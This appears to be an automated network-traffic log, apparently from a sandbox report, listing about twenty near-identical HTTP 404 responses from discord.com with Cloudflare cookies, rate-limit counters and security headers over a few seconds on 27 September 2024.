            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:04 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=36d953d87cec11efb2b57e7726d028ec; Expires=Wed, 26-Sep-2029 16:19:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453946x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2BLVaQmZS2Sc3Ef9Brfygf%2FLqkF6%2Fvon5MjZ65z4vlAicTKRzU6zDJ3HPkmqt0IG%2B3VVqG6xQ%2BjBu7AKHb8I3laRIWQ9LrPECDeecIKtvuWl3nE4B1mFOTcajhLQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=36d953d87cec11efb2b57e7726d028ecf197d44e174edb94b72f5026d3879ad6f2483b00dc1582840d93ff3c0e1a2a6c; Expires=Wed, 26-Sep-2029 16:19:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=eec4d8ba3fc34a38b5d32968d39e8cb613742df2-1727453944; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:05 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3745d8fa7cec11efbb26cece28a49ce1; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453946x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q0GzNcUAQ5QXOYzMaOpozO4%2BjxJxGJGKIdU993iowjdeHkBreq2DYvaZvOwtEOXX%2FvNladSKdp9TQTQNSGxMqQuwKdKEI3nH1ZA6A4dBnu7TKVUcvR4TWgmWjsV%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3745d8fa7cec11efbb26cece28a49ce13daca396a1a4a9e12bcb6eeac38f019c9784077103db5b2217588a1ef5ba7d7d; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=7baeebdb1a22e590ef420eaf6d22938737c07a8d-1727453945; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:05 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=374743ac7cec11efad60cece28a49ce1; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453947x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FAPX00iiQL2rdPnCQWLuW6iaItu3J7BL86ppxuslPnr%2B4oFrLgyLmEUsd6U97Dt7l1l4eDhFjjBxSy5Wf96AqxS1hGIjlQFmnMBumy%2BI43B2QF%2BS7g2YCxCsJjvz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=374743ac7cec11efad60cece28a49ce116494306dec66456f12201b532cb9c28525ab117b160869c96c8222438cb39be; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=7baeebdb1a22e590ef420eaf6d22938737c07a8d-1727453945; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=37aeaeb67cec11ef85eda6d8f199100f; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453947x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KM4BQVU0LGejaUHXf1y3BqoHku%2BjDuqeQVXkWTBIfnTsUWC5NH2ZIf354Pdni3mz7bfks51DO%2F%2BoY5Hl348PyPRudfcQ%2Be58hKtyTFrk80aXU2QuvQMhgKwcJm%2B7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=37aeaeb67cec11ef85eda6d8f199100f6db23391f423498162d6ca09eef0d3fa3b8684ee6f6c835feaaad9d48724a5b9; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=37aff3e87cec11efbb52ae4c9400efeb; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1727453947x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9qMQEAOm6NrlxMh8s5UO%2F%2BHEiFd9jjLNvRT7o6EEr7zlXwjBoVwfX1RzuhBGYqASBddXH8Ev2mezdRqvfmO2DsKUNUlSPrAv99SbtoHzfbc9J96PEV14RAe1z3zC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=37aff3e87cec11efbb52ae4c9400efebca9b0b1ab47e7d0f658e805fca08bf61eebe35b75bba37ff949679cb1f0dcdba; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=381339c67cec11efbb26cece28a49ce1; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453948x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bil0c3CqXVvvD3zwBq227AuCXJ3tJeoBU0%2BHWNRRSZLHasVn8Ad5p5m3AkkUnFib2hv%2BhS2wH80N8jALQm4SdDrYhkbc0umG8QJ1PufWFMqy0zybpgcuTfF%2F%2BUl4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=381339c67cec11efbb26cece28a49ce1f7bd41e7dceb3c44c257ff999305afb072279e843d1fc80df6472b02d4fd096e; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=381340887cec11efafbcae4c9400efeb; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1727453948x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=McIE3SqgLdgOPtBYrzWiGaix1jCSs7wySKaGD%2FERFbfj2jXNs9fbNTYHjosy5%2FRtcvfHEiDlGvpIAtkJ9IFTmCI4b1Z%2BLin3kwNxa83YpVNZSl%2Fhjv48RnuF2Ds6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=381340887cec11efafbcae4c9400efeb1db3f564adc72d3a8d8b446b99df56db4010188797c4edf082d1b3b232b9355b; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=383335be7cec11efa46d469f692a6ab3; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 1x-ratelimit-reset: 1727453949x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUsp5IVLl%2Bb6bd5%2BDCRNSiDfH7B8zZjIaYqLDDMGTmJ6pmgOsR00vjq30RzdmORPSdFjd58le4q2A%2BoLaag%2F9NQyNs2ryU6CVc%2BzEmSnVMv7zWaZOOQbsclW7Sww"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=383335be7cec11efa46d469f692a6ab3d563670ae8fa136aed5ba07caf916322885a75166b27f336f2d6c006180c359c; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:07 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=387716e47cec11efa24492cc3f667719; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1727453949x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o2Sqp9Egez%2F%2Fo5xYNm9bkyplS2mGoLogezTeOyzXaqqYr6B1AotK9LqCILgFyM6Eb5U2Mf1xqeF3iOG2rZtcxE%2BsH3O3I8g7TuEQV%2FevMyIJerg1vpr4xTTehySH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=387716e47cec11efa24492cc3f66771902cb7f58775a7929388c906eed3f87ea1e1c590be7e2057e04de1d46fa5ef857; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c0a44cf1d4ebb578a3030e3a2bd1124066d8920e-1727453947; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:07 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=387de5787cec11efa7fd768b656d6a57; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 1x-ratelimit-reset: 1727453949x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OAyEF1TnZYJlf10iIEZWrrEkISAatWyy0AtnYkkoLN%2FK0eAGpQug%2Buvz3hDMBb1ODtwRKF1bpauqz40RVT2maZLwCL4CRYbyEqFznQfIH9j3YuS3D1azwPp7Fme3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=387de5787cec11efa7fd768b656d6a576e74e38d9f01eabb85bb086eb923249a6a8921914e2be0f9f75ca31e9d4dfefb; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c0a44cf1d4ebb578a3030e3a2bd1124066d8920e-1727453947; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:07 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=38981fec7cec11ef80f2469f692a6ab3; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453950x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4Bek5%2Beth%2FT5N%2F3HReY%2F6GOrUEcz2Iq44Nal6RNGuRKOkV8PP96g7a56e3x3b2njvyI0aPbOXV5XiIc0Vu9UL1JdRtUWc42MJnW5raPso6oWyryoA3RRE%2BaxnYf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=38981fec7cec11ef80f2469f692a6ab36bd029b63b86c8f13de41a76ac6bc55389476b40226a3f1d3a3fa2524e5821f8; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c0a44cf1d4ebb578a3030e3a2bd1124066d8920e-1727453947; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:08 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=38e3c7307cec11ef97003ec234dfa563; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453950x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCoHAj4r8G6KMIRg74eJaM76feI23vzOfSCCh713JKhj4L3QmWiAkjmFUnAGcHkHjPFGmIWZiECX131fDyykiCv38YUxLC2GBN7QTFGPV%2Bf%2BJ2pSzkf4NTXJ1pj2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=38e3c7307cec11ef97003ec234dfa5632e6efa5728204c9d829a6caae7b0647161891c01be7d76d605dac8b76e61473f; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:08 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=38fb081e7cec11efa015ce5421a2957b; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453951x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8qi0QFieyFHr5IzCu7iUGCIMOcleG7k7VWtvX8gM2MWG%2ByJ3KUPvgpsxbCYKMu2yMm7yXI7jR2jA8nECf5LQtaNfoFngVO552bbszKoLCgYRgOMRG1MgjxY7lP5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=38fb081e7cec11efa015ce5421a2957b0482c3917c8f9110c39af5c875593f193ecc1f3171e117b55844e2ef89dcc1f1; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:08 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=394a31c87cec11ef80916ec6ea4fc16e; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453951x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pGEykrVebyMU%2FTzJ10ycn7GWwQAUrymWlSKk%2F70JA%2FlePm5eoVmZU1HHLwgsCm6rrJHYDh3355GH6XcZdT810MgSfr0yw2ZG5I4SaCJxvDNvEsQrKEYPETcTCHiI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=394a31c87cec11ef80916ec6ea4fc16eeb68a171fda8c701c44612801a047c2ff379b8173eabdaf48ef4e3bcc99742c0; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:09 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=39acd5087cec11efb895f699fc4aef6a; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 1x-ratelimit-reset: 1727453951x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UYBtQdG4kfaJH1oGxcUbBE98sAkGM44PGnAfmSSdjCWbOQpwQDDP36%2BWTN5d29noNaqY93Mr9wiNUPpp3AOZAn665h%2B5iwEMOrAsK4SawZSIJURDTB%2FrXi8mF%2FQ1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=39acd5087cec11efb895f699fc4aef6a82a9b4750cdf7018f34d51969ca16372a8e4b35b98421de338c03f3e6a99687a; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=4eac34489b61163802acf4eaff01ca33388837f5-1727453949; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:09 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=39b2fb687cec11efabf4124b36f1d382; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453952x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LP2pxsaji1yu2xtmtTGdkDca6HJpJxjNMtqTAPHoxg9pY4V0MKCyKVGCLDgDRYlOdmmpVM0nJCr1XdZpDZYi2C93hmMJ8TPA7BFHyi6uGefr%2FSjxTplqq%2FT4qyJ2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=39b2fb687cec11efabf4124b36f1d382f2fee3e68b0b4e5fe8b64e54d41f7df1e72556bb6b42e6797270bd2db57f4579; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=4eac34489b61163802acf4eaff01ca33388837f5-1727453949; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:10 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3a164cd67cec11ef849f62361d7ce716; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453952x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXNDsMqm7ttp6WcPQ2B4Cq46UaSzT1mWwd%2FCX31hK7PYADbf2F4%2BweKuR9%2FYuHmELLnpSVyZ7nEKgGaRkBX%2FdTQtR6i%2BOFsvBmgHMhbaInYVsj%2BOOaXfdhwxZGk6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3a164cd67cec11ef849f62361d7ce7165874f6569c4d66a6206797eb89e1609cd010cdd05def258c2f3b2a794122a928; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=ae131b04a6811b8fe62774872c5a2e51e774318a-1727453950; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:10 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3a31bc8c7cec11efa7e13ecf4d0a5a0d; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453953x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6g9rDJixmcl5WsVw1If2Zhyta3ze6tpXE5d32kQflm17bjuwpIjvYMFOrSymWL%2BFoEvZdz%2BV%2B5HfLeDFxNX7NkbizaBnA%2Fr0NKc%2BC2JLkKjc6SQWqZOZxz%2Bxwps0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3a31bc8c7cec11efa7e13ecf4d0a5a0da95afac6e7c2e05e6e4f148e3440c6316bb8a89a4ff19078fc0bff73eee4be55; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=ae131b04a6811b8fe62774872c5a2e51e774318a-1727453950; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
